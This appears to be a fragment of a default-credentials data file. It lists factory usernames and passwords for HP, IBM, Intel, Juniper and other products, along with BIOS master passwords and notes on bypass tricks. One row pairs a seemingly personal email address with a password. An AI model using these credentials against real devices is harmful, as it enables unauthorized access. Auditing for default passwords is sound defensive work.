MPE/xx,,Multi,MANAGER,TCH,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,TELESUP,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGE,VESOFT,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,CAROLIAN,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,CCC,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,CNAS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,COGNOS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,CONV,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPDESK,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPOFFICE,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPONLY,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPP187,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPP189,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPP196,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,INTX3,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,ITF3000,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,NETBASE,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,REGO,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,RJE,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,ROBELLE,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,SECURITY,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,SYS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,TELESUP,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,VESOFT,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,WORD,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,XLSERVER,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,COGNOS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,DISC,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,SUPPORT,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,SYS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,SYSTEM,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,PCUSER,SYS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,RSBCMON,SYS,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,SPOOLMAN,HPOFFICE,,, +hewlettpackard,HP 2000/3000 MPE/xx,,Multi,WP,HPOFFICE,,, +hewlettpackard,HP Jetdirect (All Models),,,,,,Any, +hewlettpackard,ISEE,,Multi,admin,isee,Admin,, +hewlettpackard,LaserJet Net Printers,Ones with Jetdirect on them,9100,,,User,Type what you want and close telnet session to print it out, +hewlettpackard,LaserJet Net Printers,Ones with Jetdirect on them,FTP,Anonymous,,User,send files to be printed, +hewlettpackard,LaserJet Net Printers,Ones with Jetdirect on them,HTTP,,,Admin,HTTP interface, +hewlettpackard,LaserJet Net Printers,Ones with Jetdirect on them,Telnet,,,Admin,press enter twice if no response in telnet, +hewlettpackard,MPE-XL,,,HELLO,FIELD.SUPPORT,,, +hewlettpackard,MPE-XL,,,HELLO,MANAGER.SYS,,, +hewlettpackard,MPE-XL,,,HELLO,MGR.SYS,,, +hewlettpackard,MPE-XL,,,MANAGER,HPOFFICE,,, +hewlettpackard,MPE-XL,,,MGR,CAROLIAN,,, +hewlettpackard,MPE-XL,,,MGR,CCC,,, +hewlettpackard,MPE-XL,,,OPERATOR,COGNOS,,, +hewlettpackard,Motive Chorus,,HTTP (port 5060),admin,isee,,, +hewlettpackard,Officejet,all versions,http,admin,,admin,http interface, +hewlettpackard,Power Manager,3,HTTP,admin,admin,Admin,, +hewlettpackard,Vectra,,Console,,hewlpack,Admin,, +hewlettpackard,iLo,,http,Admin,Admin,Admin,, +hewlettpackard,iLo,,http,oper,oper,,, +hewlettpackard,sa7200,,Multi,admin,,Admin,, +hewlettpackard,sa7200,,Multi,admin,admin,Admin,, +hewlettpackard,webmin,0.84,HTTP,admin,hp.com,Admin,, +honeywell,Experion,,,LocalComServer,LCS pwd 03,,, +honeywell,Experion,,,TPSLocalServer,TLS pwd 03,,, +horizon datasys,FoolProof,,,,foolproof,,, +horizondatasys,FoolProof,,,,foolproof,Admin,, +hosting controller,Hosting Controller,,,AdvWebadmin,advcomm500349,,, +hp,sa7200,,,admin,,,, +hp,sa7200,,Admin,admin,,,, +hp,sa7200,,Admin,admin,admin,,, +huawei,B932,,http:192.168.1.1,,,,, +huawei,MT880r,,Multi,TMAR#HWMT8007079,,Admin,, +huawei,SmartAX MT882,,,admin,admin,,, +huawei,e226,,,admin,admin,,, +huwai,Modem,,,Admin,admin,,, +huwai,Modem,,Multi,Admin,admin,,, +iblitzz,BWA711/All Models,All,HTTP,admin,admin,Admin,This Information Works On All Models Of The Blitzz Line, +ibm,2210,,,def,trade,,RIP, +ibm,3534 F08 Fibre Switch,,,admin,password,,, +ibm,3534 F08 Fibre Switch,,Admin,admin,password,,, +ibm,3534 F08 Fibre Switch,,Multi,admin,password,Admin,, +ibm,3583 Tape Library,,HTTP,admin,secure,Admin,, +ibm,390e,,,,admin,,, +ibm,390e,,Admin,,admin,,, +ibm,390e,,Multi,,admin,Admin,, +ibm,600x,,,,admin,,, +ibm,600x,,Admin,,admin,,, +ibm,600x,,Multi,,admin,Admin,, +ibm,8224 HUB,,,vt100,public,,, +ibm,8224 HUB,,Admin,vt100,public,,, +ibm,8224 HUB,,Multi,vt100,public,Admin,Swap MAC address chip from other 8224, +ibm,8225,,,I5rDv2b2JjA8Mm,A52896nG93096a,,, +ibm,8225,,Admin,I5rDv2b2JjA8Mm,A52896nG93096a,,, +ibm,8225,,Multi,I5rDv2b2JjA8Mm,A52896nG93096a,Admin,, +ibm,8237,,,I5rDv2b2JjA8Mm,A52896nG93096a,,, +ibm,8237,,Admin,I5rDv2b2JjA8Mm,A52896nG93096a,,, +ibm,8237,,Multi,I5rDv2b2JjA8Mm,A52896nG93096a,Admin,, +ibm,8239 Token Ring HUB,,2.5,,R1QTPS,,, +ibm,8239 Token Ring HUB,,Utility Program,,R1QTPS,,, +ibm,8239 Token Ring HUB,2.5,Console,,R1QTPS,Utility Program,, +ibm,A21m,,,,,,, +ibm,A21m,,Admin,,,,, +ibm,A21m,,Multi,,,Admin,, +ibm,AIX,,,guest,guest,,, +ibm,AIX,,4.X,admin,admin,,, +ibm,AIX,,Multi,guest,,User,, +ibm,AIX,,Multi,guest,guest,User,, +ibm,AIX,,User,admin,admin,,, +ibm,AIX,,User,guest,,,, +ibm,AIX,,User,guest,guest,,, +ibm,AIX,4.X,Multi,admin,admin,User,, +ibm,AS/400,,,QSECOFR,QSECOFR,,Any, +ibm,AS/400,,,QSRV,QSRV,,, +ibm,AS/400,,,QSRVBAS,QSRVBAS,,, +ibm,AS/400,,,QUSER,QUSER,,OS/400, +ibm,AS/400,,,qpgmr,qpgmr,,, +ibm,AS/400,,,qsysopr,qsysopr,,, +ibm,Aptiva,,,,,CMOS,Press both mouse buttons repeatedly during boot to bypass CMOS password, +ibm,Ascend OEM Routers,,,,ascend,,, +ibm,Ascend OEM Routers,,Admin,,ascend,,, +ibm,Ascend OEM Routers,,Telnet,,ascend,Admin,, +ibm,BladeCenter Mgmt Console,,HTTP,USERID,PASSW0RD,Admin,, +ibm,CICS,,,$SRV,$SRV,,, +ibm,CICS,,,CICSUSER,CISSUS,,, +ibm,CICS,,,DBDCCICS,DBDCCIC,,, +ibm,CICS,,,FORSE,FORSE,,, +ibm,CICS,,,OPER,OPER,,, +ibm,CICS,,,POST,BASE,,, +ibm,CICS,,,PRODCICS,PRODCICS,,, +ibm,CICS,,,PROG,PROG,,, +ibm,CICS,,,SYSA,SYSA,,, +ibm,CICS,,,VCSRV,VCSRV,,, +ibm,DB2,,,db2admin,db2admin,,WinNT, +ibm,DB2,,,db2fenc1,db2fenc1,,, +ibm,Directory - Web Administration Tool,5.1,HTTP,superadmin,secret,Admin,Documented in Web Administration Guide, +ibm,Fibre Switch,,3534 F08,admin,password,,, +ibm,Hardware Management Console,3,ssh,hscroot,abc123,Admin,, +ibm,IBM,,Multi,,,Admin,, +ibm,Infoprint 6700,,Multi,root,,Admin,Also works for older 4400 printers and probably Printronics equivalents as well., +ibm,LAN Server / OS/2,,,username,password,,2.1 3.0 4., +ibm,Lotus Domino Go WebServer (net.commerce edition),,,webadmin,webibm,,ANY ?, +ibm,NetCommerce PRO,,,ncadmin,ncadmin,,3.2, +ibm,OS/400,,,11111111,11111111,,, +ibm,OS/400,,,22222222,22222222,,, +ibm,OS/400,,,QSECOFR,QSECOFR,,OS/400, +ibm,OS/400,,,ibm,2222,,, +ibm,OS/400,,,ibm,password,,, +ibm,OS/400,,,ibm,service,,, +ibm,OS/400,,,qpgmr,qpgmr,,, +ibm,OS/400,,,qsecofr,11111111,,, +ibm,OS/400,,,qsecofr,22222222,,, +ibm,OS/400,,,qsecofr,qsecofr,,, +ibm,OS/400,,,qserv,qserv,,, +ibm,OS/400,,,qsrv,qsrv,,, +ibm,OS/400,,,qsrvbas,qsrvbas,,, +ibm,OS/400,,,qsvr,ibmcel,,, +ibm,OS/400,,,qsvr,qsvr,,, +ibm,OS/400,,,qsysopr,qsysopr,,, +ibm,OS/400,,,quser,quser,,, +ibm,OS/400,,,secofr,secofr,,, +ibm,OS/400,,,sedacm,secacm,,, +ibm,OS/400,,,sysopr,sysopr,,, +ibm,OS/400,,,user,USERP,,, +ibm,OS/400,,Multi,11111111,11111111,,, +ibm,OS/400,,Multi,22222222,22222222,,, +ibm,OS/400,,Multi,ibm,2222,,, +ibm,OS/400,,Multi,ibm,password,,, +ibm,OS/400,,Multi,ibm,service,,, +ibm,OS/400,,Multi,qpgmr,qpgmr,,, +ibm,OS/400,,Multi,qsecofr,11111111,,, +ibm,OS/400,,Multi,qsecofr,22222222,,, +ibm,OS/400,,Multi,qsecofr,qsecofr,,, +ibm,OS/400,,Multi,qserv,qserv,,, +ibm,OS/400,,Multi,qsrv,11111111,,, +ibm,OS/400,,Multi,qsrv,22222222,,, +ibm,OS/400,,Multi,qsrv,qsrv,,, +ibm,OS/400,,Multi,qsrvbas,qsrvbas,,, +ibm,OS/400,,Multi,qsvr,ibmcel,,, +ibm,OS/400,,Multi,qsvr,qsvr,,, +ibm,OS/400,,Multi,qsysopr,qsysopr,,, +ibm,OS/400,,Multi,quser,quser,,, +ibm,OS/400,,Multi,secofr,secofr,,, +ibm,OS/400,,Multi,sedacm,sedacm,,, +ibm,OS/400,,Multi,sysopr,sysopr,,, +ibm,OS/400,,Multi,userp,,No,, +ibm,PC BIOS,,,,IBM,,, +ibm,PC BIOS,,,,sertafu,,, +ibm,PC BIOS,,Admin,,IBM,,, +ibm,PC BIOS,,Admin,,MBIU0,,, +ibm,PC BIOS,,Admin,,sertafu,,, +ibm,PC BIOS,,Console,,IBM,Admin,, +ibm,PC BIOS,,Console,,MBIU0,Admin,, +ibm,PC BIOS,,Console,,merlin,No,, +ibm,PC BIOS,,Console,,sertafu,Admin,, +ibm,POS CMOS,,,ESSEX,,,, +ibm,POS CMOS,,,IPC,,,, +ibm,POS CMOS,,Console,ESSEX,,,, +ibm,POS CMOS,,Console,IPC,,,, +ibm,RACF,,,IBMUSER,SYS1,,, +ibm,RS/6000,,,root,ibm,,AIX, +ibm,RSA,,9091,wpsadmin,wpsadmin,,, +ibm,RSA,5.0,HTTP,wpsadmin,wpsadmin,9091,, +ibm,Remote Supervisor Adapter (RSA),,HTTP,USERID,PASSW0RD,Admin,, +ibm,T20,,Multi,,admin,Admin,, +ibm,T42,,HTTP,Administrator,admin,Admin,, +ibm,TS3100(3573-L2U),,http,admin,secure,,, +ibm,TS3100,,,admin,secure,,, +ibm,Tivoli,,,admin,admin,,, +ibm,Tivoli,,HTTP,admin,admin,Admin,, +ibm,TotalStorage Enterprise Server,,,storwatch,specialist,,, +ibm,TotalStorage Enterprise Server,,Admin,storwatch,specialist,,, +ibm,TotalStorage Enterprise Server,,Multi,storwatch,specialist,Admin,, +ibm,TotalStorage,,,storwatch,specialist,,, +ibm,VM/CMS,,,$ALOC$,,,, +ibm,VM/CMS,,,ADMIN,,,, +ibm,VM/CMS,,,AP2SVP,,,, +ibm,VM/CMS,,,APL2PP,,,, +ibm,VM/CMS,,,AUTOLOG1,,,, +ibm,VM/CMS,,,BATCH,,,, +ibm,VM/CMS,,,BATCH1,,,, +ibm,VM/CMS,,,BATCH2,,,, +ibm,VM/CMS,,,CCC,,,, +ibm,VM/CMS,,,CMSBATCH,,,, +ibm,VM/CMS,,,CMSUSER,,,, +ibm,VM/CMS,,,CPNUC,,,, +ibm,VM/CMS,,,CPRM,,,, +ibm,VM/CMS,,,CSPUSER,,,, +ibm,VM/CMS,,,CVIEW,,,, +ibm,VM/CMS,,,DATAMOVE,,,, +ibm,VM/CMS,,,DEMO1,,,, +ibm,VM/CMS,,,DEMO2,,,, +ibm,VM/CMS,,,DEMO3,,,, +ibm,VM/CMS,,,DEMO4,,,, +ibm,VM/CMS,,,DIRECT,,,, +ibm,VM/CMS,,,DIRMAINT,,,, +ibm,VM/CMS,,,DISKCNT,,,, +ibm,VM/CMS,,,EREP,,,, +ibm,VM/CMS,,,FSFADMIN,,,, +ibm,VM/CMS,,,FSFTASK1,,,, +ibm,VM/CMS,,,FSFTASK2,,,, +ibm,VM/CMS,,,GCS,,,, +ibm,VM/CMS,,,IDMS,,,, +ibm,VM/CMS,,,IDMSSE,,,, +ibm,VM/CMS,,,IIPS,,,, +ibm,VM/CMS,,,IPFSERV,,,, +ibm,VM/CMS,,,ISPVM,,,, +ibm,VM/CMS,,,IVPM1,,,, +ibm,VM/CMS,,,IVPM2,,,, +ibm,VM/CMS,,,MAINT,,,, +ibm,VM/CMS,,,MOESERV,,,, +ibm,VM/CMS,,,NEVIEW,,,, +ibm,VM/CMS,,,OLTSEP,,,, +ibm,VM/CMS,,,OP1,,,, +ibm,VM/CMS,,,OPERATIONS,OPERATIONS,,, +ibm,VM/CMS,,,OPERATNS,,,, +ibm,VM/CMS,,,OPERATOR,,,, +ibm,VM/CMS,,,PDMREMI,,,, +ibm,VM/CMS,,,PENG,,,, +ibm,VM/CMS,,,PROCAL,,,, +ibm,VM/CMS,,,PRODBM,,,, +ibm,VM/CMS,,,PROMAIL,,,, +ibm,VM/CMS,,,PSFMAINT,,,, +ibm,VM/CMS,,,PVM,,,, +ibm,VM/CMS,,,RDM470,,,, +ibm,VM/CMS,,,ROUTER,,,, +ibm,VM/CMS,,,RSCS,,,, +ibm,VM/CMS,,,RSCSV2,,,, +ibm,VM/CMS,,,SAVSYS,,,, +ibm,VM/CMS,,,SFCMI,,,, +ibm,VM/CMS,,,SFCNTRL,,,, +ibm,VM/CMS,,,SMART,,,, +ibm,VM/CMS,,,SQLDBA,,,, +ibm,VM/CMS,,,SQLUSER,,,, +ibm,VM/CMS,,,SYSADMIN,,,, +ibm,VM/CMS,,,SYSCKP,,,, +ibm,VM/CMS,,,SYSDUMP1,,,, +ibm,VM/CMS,,,SYSERR,,,, +ibm,VM/CMS,,,SYSWRM,,,, +ibm,VM/CMS,,,TDISK,,,, +ibm,VM/CMS,,,TEMP,,,, +ibm,VM/CMS,,,TSAFVM,,,, +ibm,VM/CMS,,,VASTEST,,,, +ibm,VM/CMS,,,VM3812,,,, +ibm,VM/CMS,,,VMARCH,,,, +ibm,VM/CMS,,,VMASMON,,,, +ibm,VM/CMS,,,VMASSYS,,,, +ibm,VM/CMS,,,VMBACKUP,,,, +ibm,VM/CMS,,,VMBSYSAD,,,, +ibm,VM/CMS,,,VMMAP,,,, +ibm,VM/CMS,,,VMTAPE,,,, +ibm,VM/CMS,,,VMTLIBR,,,, +ibm,VM/CMS,,,VMUTIL,,,, +ibm,VM/CMS,,,VSEIPO,,,, +ibm,VM/CMS,,,VSEMAINT,,,, +ibm,VM/CMS,,,VSEMAN,,,, +ibm,VM/CMS,,,VTAM,,,, +ibm,VM/CMS,,,VTAM,VTAM,,, +ibm,VM/CMS,,,VTAMUSER,,,, +ibm,VM/CMS,,Multi,$ALOC$,,,, +ibm,VM/CMS,,Multi,ADMIN,,,, +ibm,VM/CMS,,Multi,AP2SVP,,,, +ibm,VM/CMS,,Multi,APL2PP,,,, +ibm,VM/CMS,,Multi,AUTOLOG1,,,, +ibm,VM/CMS,,Multi,BATCH,,,, +ibm,VM/CMS,,Multi,BATCH1,,,, +ibm,VM/CMS,,Multi,BATCH2,,,, +ibm,VM/CMS,,Multi,CCC,,,, +ibm,VM/CMS,,Multi,CMSBATCH,,,, +ibm,VM/CMS,,Multi,CMSBATCH,CMSBATCH,,, +ibm,VM/CMS,,Multi,CMSUSER,,,, +ibm,VM/CMS,,Multi,CPNUC,,,, +ibm,VM/CMS,,Multi,CPRM,,,, +ibm,VM/CMS,,Multi,CSPUSER,,,, +ibm,VM/CMS,,Multi,CVIEW,,,, +ibm,VM/CMS,,Multi,DATAMOVE,,,, +ibm,VM/CMS,,Multi,DEMO1,,,, +ibm,VM/CMS,,Multi,DEMO2,,,, +ibm,VM/CMS,,Multi,DEMO3,,,, +ibm,VM/CMS,,Multi,DEMO4,,,, +ibm,VM/CMS,,Multi,DIRECT,,,, +ibm,VM/CMS,,Multi,DIRMAINT,,,, +ibm,VM/CMS,,Multi,DISKCNT,,,, +ibm,VM/CMS,,Multi,EREP,,,, +ibm,VM/CMS,,Multi,FSFADMIN,,,, +ibm,VM/CMS,,Multi,FSFTASK1,,,, +ibm,VM/CMS,,Multi,FSFTASK2,,,, +ibm,VM/CMS,,Multi,GCS,,,, +ibm,VM/CMS,,Multi,IDMS,,,, +ibm,VM/CMS,,Multi,IDMSSE,,,, +ibm,VM/CMS,,Multi,IIPS,,,, +ibm,VM/CMS,,Multi,IPFSERV,,,, +ibm,VM/CMS,,Multi,ISPVM,,,, +ibm,VM/CMS,,Multi,IVPM1,,,, +ibm,VM/CMS,,Multi,IVPM2,,,, +ibm,VM/CMS,,Multi,MAINT,,,, +ibm,VM/CMS,,Multi,MAINT,MAINT,,, +ibm,VM/CMS,,Multi,MOESERV,,,, +ibm,VM/CMS,,Multi,NEVIEW,,,, +ibm,VM/CMS,,Multi,OLTSEP,,,, +ibm,VM/CMS,,Multi,OP1,,,, +ibm,VM/CMS,,Multi,OPERATNS,,,, +ibm,VM/CMS,,Multi,OPERATNS,OPERATNS,,, +ibm,VM/CMS,,Multi,OPERATOR,,,, +ibm,VM/CMS,,Multi,OPERATOR,OPERATOR,,, +ibm,VM/CMS,,Multi,PDMREMI,,,, +ibm,VM/CMS,,Multi,PENG,,,, +ibm,VM/CMS,,Multi,PROCAL,,,, +ibm,VM/CMS,,Multi,PRODBM,,,, +ibm,VM/CMS,,Multi,PROMAIL,,,, +ibm,VM/CMS,,Multi,PSFMAINT,,,, +ibm,VM/CMS,,Multi,PVM,,,, +ibm,VM/CMS,,Multi,RDM470,,,, +ibm,VM/CMS,,Multi,ROUTER,,,, +ibm,VM/CMS,,Multi,RSCS,,,, +ibm,VM/CMS,,Multi,RSCSV2,,,, +ibm,VM/CMS,,Multi,SAVSYS,,,, +ibm,VM/CMS,,Multi,SFCMI,,,, +ibm,VM/CMS,,Multi,SFCNTRL,,,, +ibm,VM/CMS,,Multi,SMART,,,, +ibm,VM/CMS,,Multi,SQLDBA,,,, +ibm,VM/CMS,,Multi,SQLUSER,,,, +ibm,VM/CMS,,Multi,SYSADMIN,,,, +ibm,VM/CMS,,Multi,SYSCKP,,,, +ibm,VM/CMS,,Multi,SYSDUMP1,,,, +ibm,VM/CMS,,Multi,SYSERR,,,, +ibm,VM/CMS,,Multi,SYSWRM,,,, +ibm,VM/CMS,,Multi,TDISK,,,, +ibm,VM/CMS,,Multi,TEMP,,,, +ibm,VM/CMS,,Multi,TSAFVM,,,, +ibm,VM/CMS,,Multi,VASTEST,,,, +ibm,VM/CMS,,Multi,VM3812,,,, +ibm,VM/CMS,,Multi,VMARCH,,,, +ibm,VM/CMS,,Multi,VMASMON,,,, +ibm,VM/CMS,,Multi,VMASSYS,,,, +ibm,VM/CMS,,Multi,VMBACKUP,,,, +ibm,VM/CMS,,Multi,VMBSYSAD,,,, +ibm,VM/CMS,,Multi,VMMAP,,,, +ibm,VM/CMS,,Multi,VMTAPE,,,, +ibm,VM/CMS,,Multi,VMTLIBR,,,, +ibm,VM/CMS,,Multi,VMUTIL,,,, +ibm,VM/CMS,,Multi,VSEIPO,,,, +ibm,VM/CMS,,Multi,VSEMAINT,,,, +ibm,VM/CMS,,Multi,VSEMAN,,,, +ibm,VM/CMS,,Multi,VTAM,,,, +ibm,VM/CMS,,Multi,VTAM,VTAM,,, +ibm,VM/CMS,,Multi,VTAMUSER,,,, +ibm,a20m,,,,admin,,, +ibm,a20m,,Admin,,admin,,, +ibm,a20m,,Multi,,admin,Admin,, +ibm,management hw,,Multi,USERID,PASSW0RD,admin,, +ibm,management hw,,admin,USERID,PASSW0RD,,, +ibm,routers,,router,msmadhuastro@gmail.com,06725A1201,,, +ibm,switch,8275-217,Telnet,admin,,Admin,, +imai,Traffic Shaper,TS-1012,HTTP,,,Admin,default IP 1.2.3.4, +imperiasoftware,Imperia Content Managment System,,,superuser,superuser,,Unix/NT, +informix,Database,,,informix,informix,,, +infosmart,SOHO router,,HTTP,admin,0,Admin,, +infotec,ISC2525,System v1.67 / NIB v5.14 / WIM v1.10,http://192.168.0.100,admin,,Admin,, +infrant,ReadyNAS RAIDiator,3.01c1-p1 to -p6,,admin,infrant1,administrator,, +infrant,ReadyNAS RAIDiator,3.01c1-p1 to -p6,,root,see note,,root password is generated on each boot with a hardcoded algorithm and the password cannot be permanently changed - once discovered it will always work after the device is rebooted, +innovaphone,IP20,,Admin,admin,ip20,,, +innovaphone,IP20,,Multi,admin,ip20,Admin,, +innovaphone,IP3000,,Admin,admin,ip3000,,, +innovaphone,IP3000,,Multi,admin,ip3000,Admin,, +innovaphone,IP305,,,admin,ip305Beheer,,, +innovaphone,IP400,,Admin,admin,ip400,,, +innovaphone,IP400,,Multi,admin,ip400,Admin,, +integraltechnologies,RemoteView,4,Console,Administrator,letmein,Admin,, +integratednetworks,IP Phone,IN1002,HTTP,Administrator,1234,Admin,, +integratednetworks,IP Phone,IN1002,HTTP,Administrator,12345678,Admin,, +integratednetworks,IP Phone,IN1002,HTTP,Administrator,19750407,Admin,, +intel,Express 520T Switch,,,setup,setup,,, +intel,Express 520T Switch,,Multi,setup,setup,User,, +intel,Express 520T Switch,,User,setup,setup,,, +intel,Express 9520 Router,,,NICONEX,NICONEX,,, +intel,Express 9520 Router,,Multi,NICONEX,NICONEX,User,, +intel,Express 9520 Router,,User,NICONEX,NICONEX,,, +intel,LanRover VPN Gateway,,6.0 >,,shiva,,, +intel,LanRover VPN Gateway,,< 6.0,,isolation,,, +intel,LanRover VPN Gateway,6.0+,multi,,shiva,Admin,, +intel,LanRover VPN Gateway,below 6.0,multi,,isolation,Admin,, +intel,LanRover,6.7,Console,root,admin,Admin,, +intel,NetporrExpress,,,,,,, +intel,NetporrExpress,,Admin,,,,, +intel,Netstructure,480t,Telnet,admin,,Admin,, +intel,Shiva Access Port,All,Telnet,admin,hello,Admin,, +intel,Shiva LanRover,,,Guest,,User,, +intel,Shiva LanRover,,Multi,root,,Admin,, +intel,Shiva Lanrovers,,,root,,,, +intel,Shiva Lanrovers,,Admin,root,,,, +intel,Shiva Mezza ISDN Router,All,Telnet,admin,hello,Admin,, +intel,Shiva,,,Guest,,,, +intel,Shiva,,,root,,,, +intel,Shiva,,Admin,root,,,, +intel,Shiva,,Multi,Guest,,User,, +intel,Shiva,,User,Guest,,,, +intel,Wireless AP 2011,,2.21,,Intel,,, +intel,Wireless AP 2011,,Admin,,Intel,,, +intel,Wireless AP 2011,2.21,Multi,,Intel,Admin,, +intel,Wireless Gateway,,3.x,intel,intel,,, +intel,Wireless Gateway,,Admin,intel,intel,,, +intel,Wireless Gateway,3.x,HTTP,intel,intel,Admin,, +intel,intel,,,khan,kahn,,, +intel,intel,1,Multi,khan,kahn,,, +intel,lan rover,,6.7,root,admin,,, +intel,lan rover,,Admin,root,admin,,, +intel,netstructure,,480t,admin,,,, +intel,netstructure,,Admin,admin,,,, +intellitouch,ITC3002 VoIP Telephone Deskset,,HTTP/phone,administrator,1234,Admin,, +interbase,Interbase Database Server,,Admin,SYSDBA,masterkey,,, +interbase,Interbase Database Server,,All,SYSDBA,masterkey,,, +interbase,Interbase Database Server,All,Multi,SYSDBA,masterkey,Admin,, +intermec,EasyLAN,,10i2,,intermec,,, +intermec,EasyLAN,10i2,HTTP,,intermec,Admin,, +intermec,Mobile LAN,5.25,Multi,intermec,intermec,Admin,, +intermec,PF2i,,Multi,admin,pass,Admin,, +internetarchive,Heritrix,1.6.0,,admin,letmein,Admin,, +intershop,Intershop,,4,operator,$chwarzepumpe,,, +intershop,Intershop,,Admin,operator,$chwarzepumpe,,, +intershop,Intershop,4,HTTP,operator,$chwarzepumpe,Admin,, +intersystems,Cache Post-RDMS,,Console,system,sys,Admin,Change immediately, +intex,organizer,,,,,,, +intex,organizer,,Admin,,,,, +intex,organizer,,Multi,,,Admin,, +intuit,Quickbooks,,1.0,admin,(no-default-password),,, +intuit,Quickbooks,,2.0,admin,(no-default-password),,, +intuit,Quickbooks,,2004,admin,(no-default-password),,, +intuit,Quickbooks,,2005,admin,(no-default-password),,, +intuit,Quickbooks,,2006,admin,(no-default-password),,, +intuit,Quickbooks,,2007,admin,(no-default-password),,, +intuit,Quickbooks,,2008,admin,(no-default-password),,, +intuit,Quickbooks,,2009,admin,(no-default-password),,, +intuit,Quickbooks,,2010,admin,(no-default-password),,, +intuit,Quickbooks,,2011,admin,(no-default-password),,, +intuit,Quickbooks,,3.0,admin,(no-default-password),,, +intuit,Quickbooks,,4.0,admin,(no-default-password),,, +intuit,Quickbooks,,5.0,admin,(no-default-password),,, +intuit,Quickbooks,,6.0,admin,(no-default-password),,, +intuit,Quickbooks,,Enterprise 1.0,admin,(no-default-password),,, +intuit,Quickbooks,,Enterprise 10.0,admin,(no-default-password),,, +intuit,Quickbooks,,Enterprise 11.0,admin,(no-default-password),,, +intuit,Quickbooks,,Enterprise 4.0,admin,(no-default-password),,, +intuit,Quickbooks,,Enterprise 5.0,admin,(no-default-password),,, +intuit,Quickbooks,,Enterprise 6.0,admin,(no-default-password),,, +intuit,Quickbooks,,Enterprise 7.0,admin,(no-default-password),,, +intuit,Quickbooks,,Enterprise 8.0,admin,(no-default-password),,, +intuit,Quickbooks,,Enterprise 9.0,admin,(no-default-password),,, +inventelwanadoo,LiveBox,D34A,,Admin,Admin,Admin,, +ipstar,iPSTAR Network Box,v.2+,HTTP,admin,operator,Admin,iPSTAR Network Box is used by the CSLoxInfo Broadband Satellite system., +ipstar,iPSTAR Satellite Router/Radio,v2,HTTP,admin,operator,Admin,For CSLoxInfo and iPSTAR Customers, +ipswitch,WS_FTP Server,,,XXSESS_MGRYY,X#1833,,, +ipswitch,WS_FTP Server,,,XXSESS_MGRYY,X#1833,Admin,User's realname: Local Session Manager, +ipswitch,Whats up Gold 6.0,,,admin,admin,,Windows 9x a, +irc,IRC Daemon,,,,FOOBAR,,, +irc,IRC Daemon,,IRC,,FOOBAR,,, +ironport,C30,,,admin,ironport,,, +ironport,C30,,http,admin,ironport,Admin,, +ironport,Messaging Gateway Appliance,,Multi,admin,ironport,Admin,, +ironport,S650,,https,admin,ironport,,, +iso sistemi,winwork,,,,,,, +iso sistemi,winwork,,Admin,,,,, +iwill,PC BIOS,,,,iwill,,, +iwill,PC BIOS,,Admin,,iwill,,, +iwill,PC BIOS,,Console,,iwill,Admin,, +jaht,adsl router,AR41/2A,HTTP,admin,epicrouter,Admin,, +jd edwards,WorldVision/OneWorld,,Admin/SECOFR,JDE,JDE,,, +jd edwards,WorldVision/OneWorld,,All(?),JDE,JDE,,, +jdedwards,WorldVision/OneWorld,,Multi,PRODDTA,PRODDTA,Admin,Owner of database tables and objects, +jdedwards,WorldVision/OneWorld,All(?),Console,JDE,JDE,Admin/SECOFR,, +jdedwards,WorldVision/OneWorld,All(?),TCP 1964,JDE,JDE,Admin/SECOFR,, +jds microprocessing,Hydra 3000,,Admin,hydrasna,,,, +jds microprocessing,Hydra 3000,,r2.02,hydrasna,,,, +jdsmicroprocessing,Hydra 3000,r2.02,Console,hydrasna,,Admin,, +jetform,Jetform Design,,,Jetform,,,, +jetform,Jetform Design,,Admin,Jetform,,,, +jetform,Jetform Design,,HTTP,Jetform,,Admin,, +jetway,PC BIOS,,,,spooml,,, +jetway,PC BIOS,,Admin,,spooml,,, +jetway,PC BIOS,,Console,,spooml,Admin,, +johnson controls,HVAC System,,,johnson,control,,, +johnsoncontrols,HVAC System,,modem,johnson,control,,, +joss technology,PC BIOS,,,,57gbzb,,, +joss technology,PC BIOS,,,,technolgi,,, +joss technology,PC BIOS,,Admin,,57gbzb,,, +joss technology,PC BIOS,,Admin,,technolgi,,, +josstechnology,PC BIOS,,Console,,57gbzb,Admin,, +josstechnology,PC BIOS,,Console,,technolgi,Admin,, +juniper,All,,,root,,,Junos 4.4, +juniper,CMS,All versions,https,root,juniper,admin access,, +juniper,ISG2000,,Multi,netscreen,netscreen,Admin,Just a note - netscreen is now made by Juniper - otherwise no change, 